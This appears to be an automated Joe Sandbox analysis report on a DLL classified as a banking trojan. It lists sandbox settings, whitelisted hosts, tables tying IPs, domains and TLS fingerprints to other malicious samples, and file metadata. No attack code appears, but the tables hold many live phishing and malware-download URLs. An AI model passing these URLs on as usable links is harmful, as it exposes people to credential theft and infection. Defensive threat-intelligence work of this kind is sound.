                                                                                                                                                                                                Overall analysis duration:0h 7m 6s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Sample file name:statis1c.dll
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                Number of analysed new started processes analysed:40
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal76.bank.troj.winDLL@13/126@10/3
                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                HDC Information:
                                                                                                                                                                                                • Successful, ratio: 51.3% (good quality ratio 48.6%)
                                                                                                                                                                                                • Quality average: 78.3%
                                                                                                                                                                                                • Quality standard deviation: 29%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                • Number of executed functions: 33
                                                                                                                                                                                                • Number of non-executed functions: 45
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                                • Found application associated with file extension: .dll
                                                                                                                                                                                                Warnings:
                                                                                                                                                                                                Show All
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 104.84.56.24, 92.122.144.200, 51.104.139.180, 92.122.213.194, 92.122.213.247, 152.199.19.161, 8.241.9.254, 8.248.131.254, 8.248.139.254, 8.248.149.254, 8.253.207.121, 51.103.5.159, 51.104.144.132, 92.122.145.220, 20.54.26.129, 52.155.217.156
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                                                                Simulations

                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                No simulations

                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                IPs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                151.101.1.44ZmVkDRVpcM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                  intservers32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    inters64.dllGet hashmaliciousBrowse
                                                                                                                                                                                                      ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        W0rd.dllGet hashmaliciousBrowse
                                                                                                                                                                                                          JIOLAS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                            oosnhsyysjmns.dllGet hashmaliciousBrowse
                                                                                                                                                                                                              YEkUGz35zN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                revRPkwYTN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  salsa.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                    https://samson442.wixsite.com/outlook-webGet hashmaliciousBrowse
                                                                                                                                                                                                                      1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                        http://search.yourweatherinfonow.comGet hashmaliciousBrowse
                                                                                                                                                                                                                          mQ7NNEC9gn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                            Ql9CcBqdPy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              px1UDkl5c3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                Sd3ru9OYCk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                  biden.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                    https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.phpGet hashmaliciousBrowse
                                                                                                                                                                                                                                      fasm.dllGet hashmaliciousBrowse

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        contextual.media.netZmVkDRVpcM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        intservers32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.79.88.129
                                                                                                                                                                                                                                        inters64.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.79.88.129
                                                                                                                                                                                                                                        ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        W0rd.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        JIOLAS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        oosnhsyysjmns.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        https://evenfair.com/Doc.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 2.18.68.31
                                                                                                                                                                                                                                        https://protect-us.mimecast.com/s/QGyCCwpEkBHL4z55AFqWI_G?domain=url4659.orders.vanillagift.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        YEkUGz35zN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        revRPkwYTN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 23.210.250.97
                                                                                                                                                                                                                                        salsa.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        mQ7NNEC9gn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 2.20.86.97
                                                                                                                                                                                                                                        Ql9CcBqdPy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 2.20.86.97
                                                                                                                                                                                                                                        px1UDkl5c3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 2.20.86.97
                                                                                                                                                                                                                                        Sd3ru9OYCk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 2.20.86.97
                                                                                                                                                                                                                                        biden.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.80.28.24
                                                                                                                                                                                                                                        fasm.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.79.88.129
                                                                                                                                                                                                                                        c8mCgwz9HX.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 104.84.56.24
                                                                                                                                                                                                                                        tls13.taboola.map.fastly.netZmVkDRVpcM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        intservers32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        inters64.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        W0rd.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        JIOLAS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        oosnhsyysjmns.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://t.yesware.com/tt/ae9851ab7b578dad1289f08bbf450624f7ae3a45/2ee42987f58d2f32bb36ff11a00dd921/2f4e7e35c28c3b7f4958904f5584a915/joom.ag/2VFCGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://joom.ag/3wFCGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        YEkUGz35zN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        revRPkwYTN.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        salsa.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://samson442.wixsite.com/outlook-webGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://search.yourweatherinfonow.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        mQ7NNEC9gn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        Ql9CcBqdPy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        px1UDkl5c3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        Sd3ru9OYCk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        biden.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        ocsp.sca1b.amazontrust.comcon3cti0n.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 65.9.77.71
                                                                                                                                                                                                                                        con3cti0n.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.214.74
                                                                                                                                                                                                                                        opzi0n1[1].dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.96
                                                                                                                                                                                                                                        con3cti0n.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.195.167
                                                                                                                                                                                                                                        c0nnect1on.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.213
                                                                                                                                                                                                                                        c0nnect1on.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 65.9.70.13
                                                                                                                                                                                                                                        c0nnect1on.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.96
                                                                                                                                                                                                                                        c0nnect1on.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.175
                                                                                                                                                                                                                                        0pz1on1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.15.36
                                                                                                                                                                                                                                        0pz1on1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.15.203
                                                                                                                                                                                                                                        0pz1on1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 54.230.104.94
                                                                                                                                                                                                                                        opzi0n1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.175
                                                                                                                                                                                                                                        H5MmXCKkB1.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 65.9.23.43
                                                                                                                                                                                                                                        new-awsd.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.194
                                                                                                                                                                                                                                        CAISSON64.EXEGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.175
                                                                                                                                                                                                                                        Scan_Image_from_IMANAGE_MALTA.pdfGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.32.182.145
                                                                                                                                                                                                                                        http://civiljour.tkGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.32.177.52
                                                                                                                                                                                                                                        http://partypoker.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.10.85
                                                                                                                                                                                                                                        NEURILINK DOCUMENT. 20062018.pdfGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.32.177.193
                                                                                                                                                                                                                                        June 2018 LE Newsletter - Customer.pdfGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.32.177.194

                                                                                                                                                                                                                                        ASN

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        AMAZON-02USxJbFpiVs1lGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 18.151.37.57
                                                                                                                                                                                                                                        https://iofs.typeform.com/to/vj4hQ0pXGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.225.80.79
                                                                                                                                                                                                                                        http://www.cqdx.ru/ham/new-equipment/handmade-cw-keys-by-ra1aom/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.194.99
                                                                                                                                                                                                                                        https://spytarget.com.mx/m0355/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.194.119
                                                                                                                                                                                                                                        http://login.micrasoft-office365.com/a36463f878?l=58Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.89.182
                                                                                                                                                                                                                                        http://www.nativlang.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.93.32
                                                                                                                                                                                                                                        https://officewebfiledocument00000000.doodlekit.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.216.129.51
                                                                                                                                                                                                                                        uM87pWnV44.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.217.97.43
                                                                                                                                                                                                                                        http://fapp1.arthfc.com/DQIVCTKON?id=45065=exoJBwdQVgJQTQEFBlYBBlMBUR8=FV4fDQ9cS0tUWVdfeBBYGVQKEEhUBwEDAVAABlMJVVRVBV5UVklQEUZAAx8XAFhHQ1RIVRdFWVNVSFJZDh4lMixgJTUoenZaW1RFRgo=&fl=UBJNR0BfSRsHWEUbWh8eBQQADgxVbw==Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.41.3.203
                                                                                                                                                                                                                                        qItg1v4pVH.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.216.164.58
                                                                                                                                                                                                                                        Xqgvj3afT1.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.221.6.123
                                                                                                                                                                                                                                        https://survey.alchemer.com/s3/6088660/INVOICEGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 13.224.93.79
                                                                                                                                                                                                                                        https://s3.eu-central-1.amazonaws.com/dasmalwerk/downloads/240387329dee4f03f98a89a2feff9bf30dcba61fcf614cdac24129da54442762/240387329dee4f03f98a89a2feff9bf30dcba61fcf614cdac24129da54442762.zipGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.219.72.243
                                                                                                                                                                                                                                        IMG-033-020.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 18.156.67.65
                                                                                                                                                                                                                                        All Open.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 3.138.82.195
                                                                                                                                                                                                                                        https://secureddoc.unicornplatform.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.90.73
                                                                                                                                                                                                                                        New.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 18.197.62.51
                                                                                                                                                                                                                                        https://bit.ly/3nUsOZYGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 143.204.101.86
                                                                                                                                                                                                                                        googlechrome_3843.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 75.2.66.247
                                                                                                                                                                                                                                        Recepit of Confirm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 52.58.154.10
                                                                                                                                                                                                                                        FASTLYUShttps://iofs.typeform.com/to/vj4hQ0pXGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.66.109
                                                                                                                                                                                                                                        ZmVkDRVpcM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.html&updated=1607968421005Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.12.193
                                                                                                                                                                                                                                        intservers32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        inters64.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        W0rd.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        Z4bamJ91oo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.65.195
                                                                                                                                                                                                                                        U0N4EBAJKJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.119
                                                                                                                                                                                                                                        aG2hS5oQsq.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.119
                                                                                                                                                                                                                                        JIOLAS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        oosnhsyysjmns.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        zethpill.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.12.193
                                                                                                                                                                                                                                        imgengine.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.133
                                                                                                                                                                                                                                        http://url7046.davenportaviation.com/ls/click?upn=Pqmk-2BR5UYiYrLs3LOQb6eX8-2FwMNRh93DHwpY5jegAMonakc5abwzYkjZwuJJIdpTUfwxS3-2FAx2Gg6cNlydrr3lSyhbQTpfJekghaGpBvYb34VwHegANFETS-2FFd170CzXgnUntkFmes-2BUYVWS7isVSQ-2BbQcyOyt4f-2Bdn-2BlFnZ-2Bqc-3DTWzB_2IBYBvCQdAsKAURptGS99dQMFBKrK1wN4XnxMdJ0cXIh9nYwGT3Xwu-2BJ4yf9Ega2-2Fb4aBZPIv-2F3Uh6pUJMakz0TzeZTX0xl7pOsgfOO7FI6CvgBpGnBWoUQlNzcwTa1LKYuValVrvKiMxY1ZNZHP-2BwhweO-2FZEg0fuZ6oQdKpkhXMgoW3oLYapFkguRBnE85xKgVHSn2GJnx3Lso6MZ9nDxeiqulUm-2FFAzZN-2BDV7xlDk-3DGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.195
                                                                                                                                                                                                                                        http://www.cqdx.ruGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.56.159
                                                                                                                                                                                                                                        http://kikicustomwigs.com/inefficient.phpGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.217
                                                                                                                                                                                                                                        https://t.yesware.com/tt/ae9851ab7b578dad1289f08bbf450624f7ae3a45/2ee42987f58d2f32bb36ff11a00dd921/2f4e7e35c28c3b7f4958904f5584a915/joom.ag/2VFCGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.130.217
                                                                                                                                                                                                                                        https://quip.com/bsalAnQMfvNmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.110
                                                                                                                                                                                                                                        http://url7046.davenportaviation.com/ls/click?upn=Pqmk-2BR5UYiYrLs3LOQb6eX8-2FwMNRh93DHwpY5jegAMoDOwszjVyyAYaDT-2FHLoDdyO6UKIM2nszToDBLH-2F-2BNBrM6YQWQ3fPgFgPdQQKS7kqDF4HAaq-2Fr6xARUzkvrAsaEOKHpwbrn6MO6h-2FVQHqp3WyMFrzO-2FMB03yvlq5NFbbAuXPdxXXNisWAoifgesDs3QJMZE_MTQeFU9OGQYuK17CNM-2FHMO1to19MQZsIfTzkvxZNPLbcqMHTFg465yb8XLd5b0rgockrJEbP9S-2BmH6yrcb6D2Cedv8q0zDKvCKHjkGBdm0VSLiKWxvNJFHYTC9Iu2wUuCoFD26NSM7oM4H1iIEuKaivLf23AP7umZUdZ2jjs6dVp5S47XHieCaV16dvBQPvHZmuEMRH0w6XX1JETA-2BLpCr8JmDoRvBBZSGH-2FQaexfGo-3DGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.65.195

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        9e10692f1b7f78228b2d4e424db3a98chttps://iofs.typeform.com/to/vj4hQ0pXGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://spytarget.com.mx/m0355/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://unofficialseaworld.com/Secured-Doc/onedrive-3D4/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://recp.mkt91.net/ctt?m=804040&r=Njg0NjYxMDU1NQS2&b=0&j=NjAwMDczOTg3S0&k=NCLogo&kx=1&kt=12&kd=https://kikstop.com/202052t44bfDecember#David.Henshall@citrix.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://kikstop.com/202052t44bfDecember#David.Henshall@citrix.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://zzar.ru/common/dGF4dXRzYWNjZXNzaGVscEB0d2MudGV4YXMuZ292Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://login.micrasoft-office365.com/a36463f878?l=58Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://baylor.skidleo.com/#al9tYXJ0aW5AYmF5bG9yLmVkdQ==Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://www.nativlang.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://officewebfiledocument00000000.doodlekit.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://fapp1.arthfc.com/DQIVCTKON?id=45065=exoJBwdQVgJQTQEFBlYBBlMBUR8=FV4fDQ9cS0tUWVdfeBBYGVQKEEhUBwEDAVAABlMJVVRVBV5UVklQEUZAAx8XAFhHQ1RIVRdFWVNVSFJZDh4lMixgJTUoenZaW1RFRgo=&fl=UBJNR0BfSRsHWEUbWh8eBQQADgxVbw==Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        ZmVkDRVpcM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.html&updated=1607968421005Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://cloud-dwgp.com/SharedInfo-ViewGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://survey.alchemer.com/s3/6088660/INVOICEGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        intservers32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        inters64.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        http://recp.mkt91.net/ctt?m=804040&r=Njg0NjYxMDU1NQS2&b=0&j=NjAwMDczOTg3S0&k=NCLogo&kx=1&kt=12&kd=https%3A//globegroupdubai.com/dfghjgfdfgh%23chris.higdon@gracehealthmi.org&data=04|01|russ.johnson@gracehealthmi.org|eb2a1476a6d74d9d8c6908d8a05543ac|501385e324fe4d2390e84ae2370ff8a3|0|0|637435635352419497|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=p+GgusMB9dgGqohMUy38gOhJF1aDSqZtM+7J8UcALPU=&reserved=0Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44
                                                                                                                                                                                                                                        ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.44

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):2.469670487371862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                                                        MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                                                        SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                                                        SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                                                        SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                                                        Preview: <root></root>
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2964
                                                                                                                                                                                                                                        Entropy (8bit):4.889104370393214
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:LLYLYLYLYfYfYfYfGYfYXYXvYXYXYI2YI2YI2YI2+P9YI2+P9IXYI2+P9YI2+P9f:nsssAAAAGAssvss32323232+P932+P9Q
                                                                                                                                                                                                                                        MD5:5964F39F61B452587E32854B4D49F070
